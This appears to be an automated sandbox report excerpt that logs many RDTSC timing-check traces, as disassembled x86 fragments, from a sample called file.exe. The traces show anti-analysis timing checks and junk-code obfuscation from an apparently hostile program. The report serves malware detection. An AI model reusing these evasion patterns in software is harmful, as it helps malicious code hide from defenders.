Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8D2A6 second address: F8D320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FB958B0701Ah 0x0000000c pop edx 0x0000000d popad 0x0000000e nop 0x0000000f movzx ebx, si 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FB958B07018h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 call 00007FB958B0701Ah 0x00000038 cld 0x00000039 pop ebx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov edi, ecx 0x00000043 mov eax, dword ptr [ebp+122D141Dh] 0x00000049 xor edi, 46369CA7h 0x0000004f push FFFFFFFFh 0x00000051 mov edi, dword ptr [ebp+122D3A38h] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FB958B0701Eh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8C285 second address: F8C289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8F0C8 second address: F8F0E8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB958B07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB958B07024h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8F352 second address: F8F3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 jnp 00007FB958FCD44Ch 0x0000000d jl 00007FB958FCD446h 0x00000013 pop esi 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FB958FCD448h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push dword ptr fs:[00000000h] 0x00000036 adc edi, 622F91B5h 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 je 00007FB958FCD44Bh 0x00000049 mov ebx, 1A17A884h 0x0000004e mov eax, dword ptr [ebp+122D1021h] 0x00000054 mov dword ptr [ebp+122D28B7h], ebx 0x0000005a push FFFFFFFFh 0x0000005c push 00000000h 0x0000005e push eax 0x0000005f call 00007FB958FCD448h 0x00000064 pop eax 0x00000065 mov dword ptr [esp+04h], eax 0x00000069 add dword ptr [esp+04h], 0000001Dh 0x00000071 inc eax 0x00000072 push eax 0x00000073 ret 0x00000074 pop eax 0x00000075 ret 0x00000076 mov edi, eax 0x00000078 nop 0x00000079 jo 00007FB958FCD45Ch 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007FB958FCD44Eh 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F3F7 second address: F8F407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FB958B0701Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F910AB second address: F910AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F910AF second address: F91109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB958B0701Ch 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FB958B07018h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D296Bh], edi 0x0000002d push 00000000h 0x0000002f add di, 9F0Bh 0x00000034 push 00000000h 0x00000036 sbb bh, 00000012h 0x00000039 xchg eax, esi 0x0000003a push ecx 0x0000003b jmp 00007FB958B0701Ah 0x00000040 pop ecx 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jbe 00007FB958B07016h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91109 second address: F9110D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9212A second address: F92130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92130 second address: F92134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92134 second address: F92152 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB958B07022h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F921D7 second address: F921E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB958FCD446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38615 second address: F38632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07025h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F932FE second address: F9339E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB958FCD451h 0x00000008 jnl 00007FB958FCD446h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FB958FCD448h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e push dword ptr fs:[00000000h] 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FB958FCD448h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 mov edi, dword ptr [ebp+122D226Eh] 0x0000005c mov edi, dword ptr [ebp+122D341Ch] 0x00000062 mov eax, dword ptr [ebp+122D04B9h] 0x00000068 add dword ptr [ebp+12448A47h], edx 0x0000006e push FFFFFFFFh 0x00000070 jns 00007FB958FCD44Eh 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 jo 00007FB958FCD44Ch 0x0000007f jnl 00007FB958FCD446h 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F967B7 second address: F967D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB958B07029h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F967D9 second address: F96865 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB958FCD448h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D38D8h] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 sbb bx, 2CE6h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007FB958FCD448h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 00000016h 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e jbe 00007FB958FCD446h 0x00000044 mov eax, dword ptr [ebp+122D0A91h] 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007FB958FCD448h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 mov bx, D7E8h 0x00000068 push FFFFFFFFh 0x0000006a jp 00007FB958FCD44Ch 0x00000070 mov dword ptr [ebp+1244E75Ah], eax 0x00000076 nop 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96865 second address: F96869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97722 second address: F97726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96869 second address: F9688C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB958B0701Fh 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99A0A second address: F99A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F987F1 second address: F987F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FD03 second address: F9FD1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958FCD454h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FD1D second address: F9FD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FD23 second address: F9FD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F403 second address: F9F433 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB958B0701Dh 0x00000008 jns 00007FB958B07016h 0x0000000e popad 0x0000000f jmp 00007FB958B07023h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F433 second address: F9F439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F569 second address: F9F591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jns 00007FB958B07031h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6EA0 second address: FA6EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD451h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FB958FCD446h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6EBB second address: FA6EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07028h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB958B0701Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8912 second address: FA8965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FB958FCD44Fh 0x0000000f pushad 0x00000010 jmp 00007FB958FCD459h 0x00000015 jmp 00007FB958FCD454h 0x0000001a popad 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8965 second address: FA896A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA896A second address: FA8983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FB958FCD44Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8983 second address: FA89A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jng 00007FB958B07028h 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007FB958B07016h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA89A3 second address: FA89A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8A3C second address: FA8A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB958B07026h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8B52 second address: FA8B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C35 second address: FA8C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C3B second address: FA8C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FB958FCD453h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C56 second address: FA8C7C instructions: 0x00000000 rdtsc 0x00000002 je 00007FB958B0701Ch 0x00000008 je 00007FB958B07016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB958B07020h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C7C second address: FA8CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB958FCD44Ch 0x00000008 jl 00007FB958FCD446h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jmp 00007FB958FCD44Ch 0x00000019 jmp 00007FB958FCD44Eh 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jg 00007FB958FCD454h 0x00000029 push eax 0x0000002a push edx 0x0000002b js 00007FB958FCD446h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8CC4 second address: DD1D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jc 00007FB958B0702Ch 0x0000000d jmp 00007FB958B07026h 0x00000012 jmp 00007FB958B07029h 0x00000017 push dword ptr [ebp+122D142Dh] 0x0000001d jno 00007FB958B07033h 0x00000023 call dword ptr [ebp+122D1BCDh] 0x00000029 pushad 0x0000002a jmp 00007FB958B07024h 0x0000002f xor eax, eax 0x00000031 pushad 0x00000032 jbe 00007FB958B0701Ch 0x00000038 mov bx, 2835h 0x0000003c popad 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007FB958B0701Fh 0x00000046 mov dword ptr [ebp+122D3A7Ch], eax 0x0000004c stc 0x0000004d mov esi, 0000003Ch 0x00000052 jc 00007FB958B0701Ch 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c sub dword ptr [ebp+122D3374h], ecx 0x00000062 mov dword ptr [ebp+122D2BBDh], ebx 0x00000068 lodsw 0x0000006a jmp 00007FB958B0701Ch 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 stc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 jmp 00007FB958B0701Ch 0x0000007d nop 0x0000007e push edi 0x0000007f pushad 0x00000080 jng 00007FB958B07016h 0x00000086 jmp 00007FB958B07028h 0x0000008b popad 0x0000008c pop edi 0x0000008d push eax 0x0000008e push edx 0x0000008f push eax 0x00000090 push edx 0x00000091 jmp 00007FB958B07020h 0x00000096 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADCB4 second address: FADCB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FACA2F second address: FACA39 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB958B07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FACA39 second address: FACA3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FACA3E second address: FACA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B07026h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAD2F3 second address: FAD2FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB958FCD446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAD9C4 second address: FAD9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FB958B0701Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9C02 second address: FB9C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB958FCD455h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9C21 second address: FB9C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9C27 second address: FB9C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F409F5 second address: F409FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB958B07016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8658 second address: FB868F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB958FCD454h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FB958FCD44Ch 0x0000000f pushad 0x00000010 jne 00007FB958FCD446h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jl 00007FB958FCD44Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB868F second address: FB8693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB890F second address: FB8917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8917 second address: FB8923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8BED second address: FB8C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB958FCD457h 0x00000008 jmp 00007FB958FCD458h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8D78 second address: FB8D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB958B07016h 0x0000000a jmp 00007FB958B07024h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8F28 second address: FB8F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8F31 second address: FB8F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9038 second address: FB9055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FB958FCD44Ah 0x0000000b je 00007FB958FCD446h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB91E0 second address: FB91E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB91E6 second address: FB91F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB958FCD446h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB91F3 second address: FB9202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958B0701Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9202 second address: FB9206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB94F9 second address: FB94FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB94FD second address: FB9548 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 jmp 00007FB958FCD453h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FB958FCD459h 0x00000013 jnl 00007FB958FCD452h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9548 second address: FB9555 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB958B07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64AA6 second address: F64AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64AAA second address: F64AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE95A second address: FBE964 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB958FCD446h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84B33 second address: F84B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84B37 second address: F84B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d lea eax, dword ptr [ebp+12486849h] 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB958FCD448h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D5ABBh], eax 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 pop eax 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8510D second address: F85113 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85113 second address: F8511A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
